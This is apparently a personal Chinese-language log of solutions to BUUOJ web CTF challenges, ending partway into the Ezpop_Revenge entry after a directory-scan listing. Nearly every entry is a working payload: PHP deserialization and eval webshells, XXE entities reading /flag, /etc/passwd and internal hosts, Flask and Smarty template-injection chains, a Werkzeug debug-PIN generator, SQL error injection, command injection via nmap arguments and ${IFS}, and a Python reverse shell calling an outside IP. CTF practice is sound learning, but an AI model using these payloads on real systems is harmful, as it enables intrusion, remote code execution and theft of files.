BUU_Web_刷题记录_part2

(反序列化)[网鼎杯 2020 青龙组]AreUSerialz

• O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:6:"laolao";}

知识点:

• protected绕过：php7.1+版本对属性类型不敏感，所以本地序列化就直接用public就可以绕过
• Linux下Apache目录明细

(XXE)[网鼎杯 2020 青龙组]filejava

• 读取WEB-XML：?filename=./../../../../WEB-INF/web.xml
• 下载class:
  • ?filename=./../../../../WEB-INF/classes/cn/abc/servlet/UploadServlet.class
  • ?filename=./../../../../WEB-INF/classes/cn/abc/servlet/ListFileServlet.class
  • ?filename=./../../../../WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
• 查看源码，然后走xee
  • 选择Buu basic中的“Linux Labs”，ifconfig查看一下本机ip，在“/var/www/html”目录里写一份的dtd，url填的是 本机ip+自己设定的等会要监听的端口号，nc开启监听
  • 新建一份excel文档，后缀名改成“zip”，解压缩后可以看到一个叫 “[Content_Types].xml” 的文件，打开这份文件，添加一条代码，用来引用外部dtd实体，编辑好了再压缩回去，把后缀改回“xlsx”，选择文件上传，就可以在内网的这台机子上发现flag
  • 注意:命名格式-->"excel-***.xlsx"

知识点：

• https://www.gem-love.com/websecurity/2322.html 
• https://www.anquanke.com/post/id/205215

(PHP弱类型绕过)[MRCTF2020]Ez_bypass

——哎,真是纯真时代的美好题型

• get:?gg[]=1&id[]=0
• post:passwd=1234567a

(XXE)[NCTF2019]Fake XML cookbook

<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE hack [<!ENTITY lao SYSTEM "file:///flag">]>
<user><username>&lao;</username><password>123</password></user>

知识点：

• 从XML相关一步一步到XXE漏洞
• DTD 教程
• XML 系列教程
• <!ENTITY lao SYSTEM "file:///flag">：声明一个外部实体。实体名：lao,实体内容："file:///flag"的值，来自本地计算机：SYSTEM
• &lao;：引用这个实体
• <!DOCTYPE hack ：定义此文为hack类型
• 外部实体支持的协议：

(反序列+脑洞)[网鼎杯 2020 朱雀组]phpweb

• func=readfile&p=index.php

<?php
class Test {
    public $p = "ls /tmp";
    public $func = "system";
}
$b=new Test();
$a=serialize($b);
echo $a;

• func=unserialize&p=O:4:"Test":2:{s:1:"p";s:7:"ls /tmp";s:4:"func";s:6:"system";}
• func=readfile&p=/tmp/flagoefiu4r93

(脑洞)[MRCTF2020]PYWebsite

• 头部添加：X-Forwarded-For:127.0.0.1

(反序列化)[NPUCTF2020]ReadlezPHP

• flag在phpinfo()里面

<?php
error_reporting(1);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}

$t = new HelloPhp();
$t->b = 'assert';
$t->a = 'phpinfo();';

echo urlencode(serialize($t));
?>

(Json)[FBCTF2019]RCEService

• ?cmd={ %0A "cmd":"/bin/cat  /home/rceservice/flag jail" %0A}
• preg_match()函数只能匹配第一行数据，可以使用换行符%0a绕过

(CMS)[GKCTF2020]老八小超市儿

• 直接百度ShopXO的漏洞
• admin.php用默认密码登进去（admin  shopxo）
• 应用商城下载默认主题，把自己的马加进去，然后上传连马
  • http://4f0630d6-cac1-4165-827a-407050333901.node3.buuoj.cn/public/static/index/default/lao.php
• 红色的auto.sh每60s执行一个python程序
  • /var/mail/makeflaghint.py
• 进去修改代码，读取/roo/flag到flag.hint里面

[GKCTF2020]cve版签到

• ?url=http://127.0.0.123%00.ctfhub.com

• cve-2020-7066简单解析

(PHP禁用函数绕过)[GKCTF2020]CheckIN

漏洞：php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令影响范围是linux，php7.0-7.3

• ?Ginkgo=cGhwaW5mbygpOw==
• 蚁剑连接:?Ginkgo=ZXZhbCgkX1BPU1RbJ2xhbyddKTs= ,密码：lao
• 在/tmp目录上传exp（pwn('/readflag‘）
• ?Ginkgo=dmFyX2R1bXAoaW5jbHVkZSgnL3RtcC9sYWppLnBocCcpKTs=

(PHP取反|异或绕过)[极客大挑战 2019]RCE ME

• ?code=(~%8F%97%8F%96%91%99%90)();
• 传一句话蚁剑连接，使用插件“绕过disable_functions”
• 关于PHP正则的一些绕过方法
• bypass_disable_functions

(ssti,Flask)[GYCTF2020]FlaskApp

绕过

• https://www.cnblogs.com/h3zh1/p/12694933.html
• https://www.cnblogs.com/h3zh1/p/12694933.html

#1.读源码
{% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__=='catch_warnings' %}
        {{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
    {% endif %}
{% endfor %}
#2.遍历根目录
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}
#3.getflag
{% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__=='catch_warnings' %}
        {{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}
    {% endif %}
{% endfor %}

 pin

• https://www.cnblogs.com/MisakaYuii-Z/p/12407760.html

# {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}} # flaskweb
# {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/sys/class/net/eth0/address').read()}}   # 02:42:ae:01:f0:45=2485410459717
# {{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/proc/self/cgroup').read()}} # docker机器id b1dea45d61a2c105caf3b988cad9553d5467ffd8d9c81521e7a71514d6a333e2
import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.7/site-packages/flask/app.py',
]

private_bits = [
    '2485410459717',
    'b1dea45d61a2c105caf3b988cad9553d5467ffd8d9c81521e7a71514d6a333e2'
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

# PIN:436-259-020

 

(nmap命令行参数注入)[网鼎杯 2020 朱雀组]Nmap

• ' <?= @eval($_POST["pd"]);?> -oG pd.phtml '

(水题)[BSidesCF 2019]Futurella

• 右键看源码

(flask+反弹连接)[V&N2020 公开赛]CHECKIN

• https://www.zhaoj.in/read-6407.html
• 【Linux恢复误删除的文件或者目录】
• 【反弹shell payload总结 】
  

# 反弹shell，然后再/proc里找fd
?c=python3  -c  'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("174.1.245.102",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

(ssti+rc4)[CISCN2019 华东南赛区]Double Secret

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
    # print("RC4加密主函数")
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))  
    # print("原来的 s 盒：%s" % s_box)
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    # print("混乱后的 s 盒：%s"% s_box)
    return s_box
def rc4_excrypt(plain, box):
    # print("调用加密程序成功。")
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    print("加密后的字符串是：%s" %quote(cipher))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))

 
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")

 

(ssti)[CISCN2019 华东南赛区]Web11

smarty常用payload

{if phpinfo()}{/if}
{if system('ls')}{/if}
{ readfile('/flag') }
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if} 

 

(报错注入)[CISCN2019 华北赛区 Day1 Web5]CyberPunk

user_name=1&phone=1&address=1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),10,40)),0x7e),1)#

 

(POP)[CISCN2019 总决赛 Day1 Web4]Laravel1

https://xz.aliyun.com/t/5816#toc-0

(文件包含)[BSidesCF 2020]Had a bad day

随便输入什么出现了一个报错，显示了文件包含漏洞，用伪协议读取一下源码

?category=php://filter/convert.base64-encode/resource=index

<?php
    $file = $_GET['category'];

    if(isset($file))
    {
        if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
            include ($file . '.php');
        }
        else{
            echo "Sorry, we currently only support woofers and meowers.";
        }
    }
?>

查了一下strpos显示的是第一次出现的位置，猜一个：

?category=php://filter/convert.base64-encode/resource=index/../flag

<!-- Can you read this flag? -->
<?php
 // flag{64bc10cd-52b8-4673-b643-5957a3aff158}
?>

emmm，就结束了

（绕过）[WUSTCTF2020]朴实无华

扫一下扫出一个robots.txt

User-agent: *
Disallow: /fAke_f1agggg.php

不是，查看response发现：

HTTP/1.1 200 OK
Server: openresty
Date: Thu, 29 Oct 2020 13:06:35 GMT
Content-Type: text/html
Content-Length: 22
Connection: close
Look_at_me: /fl4g.php
X-Powered-By: PHP/5.5.38

flag{this_is_not_flag}

得到源码，开始绕过

level1查了一个intval（通过使用指定的进制 base 转换（默认是十进制），返回变量 var 的 integer 数值），用十六进制绕过；level2爆破用0e绕过md5；

import hashlib
import threading
import re
flag=0
def MD5(data):
    return hashlib.md5(data.encode()).hexdigest()
# def Get():
#     a=""
#     for i in range(9):
#         a +=str(hex(random.randint(0, 9)))[2]
#     return a
def main():
    global flag
    i=2510901
    while True:
        i = i + 1
        data = '0e{}'.format(i)
        data_md5 =MD5(data)
        if  re.match("^0e",data_md5):
            print("Tag >>{} ,md5 {}".format(data,data_md5[2:]))
        if re.match("^0e\d{30}",data_md5):
            flag=1
            print("{}\nmd5():{}\n".format(data,data_md5))
            break
def Lao():
    global flag
    for i in range(20):
        if flag:
            return
        t = threading.Thread(target=main)
        t.start()
if __name__ == '__main__':
    # print(Get())
    Lao()
    # print(re.match("^0e\d{30}", "0e101716511611111112112107458n21", re.I))

跑了一上午，

leve3空格绕过，cat用head或者tail绕过

?num=0x2019
&md5=0e215962017
&get_flag=ls${IFS}-la

?num=0x2019
&md5=0e215962017
&get_flag=head${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag 

 

(XXE)[NCTF2019]True XML cookbook

一个很明显的xxe

POST /doLogin.php HTTP/1.1
Host: 5b616657-6365-4818-8fb9-e715cb43fbae.node3.buuoj.cn
Content-Length: 159
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Content-Type: application/xml;charset=UTF-8
Origin: http://5b616657-6365-4818-8fb9-e715cb43fbae.node3.buuoj.cn
Referer: http://5b616657-6365-4818-8fb9-e715cb43fbae.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

<?xml version="1.0"?>
<!DOCTYPE abcd[
<!ENTITY laolao SYSTEM "file:///etc/passwd">]>

<user><username>&laolao;</username><password>123546</password></user>

读源码,得到账号密码，emm没有什么卵用

<?xml version="1.0"?>
<!DOCTYPE abcd[
<!ENTITY laolao SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/doLogin.php">]>

<user><username>&laolao;</username><password>123546</password></user>

内网主机探测，发现10.208.160.9，burp跑一下在11出发现flag

<?xml version="1.0"?>
<!DOCTYPE abcd[
<!ENTITY laolao SYSTEM "file:///etc/hosts">]>

<user><username>&laolao;</username><password>123546</password></user>

 

（Padding Oracle）[NPUCTF2020]web

没啥好说的下面的链接写的很详细（这尼玛是web?!）,最后整一个java逆向，拖到ida

Padding Oracle，wp，Web狗要懂的Padding Oracle攻击，我对Padding Oracle攻击的分析和思考（详细）

 

[MRCTF2020]Ezpop_Revenge

目录扫描，扫到一堆，flag.php直接访问没用，www.zip下载下来源码审计

200 http://f4df4e8a-8d50-49ee-9335-f8a453011cf3.node3.buuoj.cn/www.zip
200 http://f4df4e8a-8d50-49ee-9335-f8a453011cf3.node3.buuoj.cn/index.php
200 http://f4df4e8a-8d50-49ee-9335-f8a453011cf3.node3.buuoj.cn/flag.php
200 http://f4df4e8a-8d50-49ee-9335-f8a453011cf3.node3.buuoj.cn/admin/
200 http://f4df4e8a-8d50-49ee-9335-f8a453011cf3.node3.buuoj.cn/admin/index.php
200 http://f4df4e8a-8d50-49ee-9335-f8a453011cf3.node3.buuoj.cn/admin/login.php
200 http://f4df4e8a-8d50-49ee-9335-f8a453011cf3.node3.buuoj.cn/admin/user.php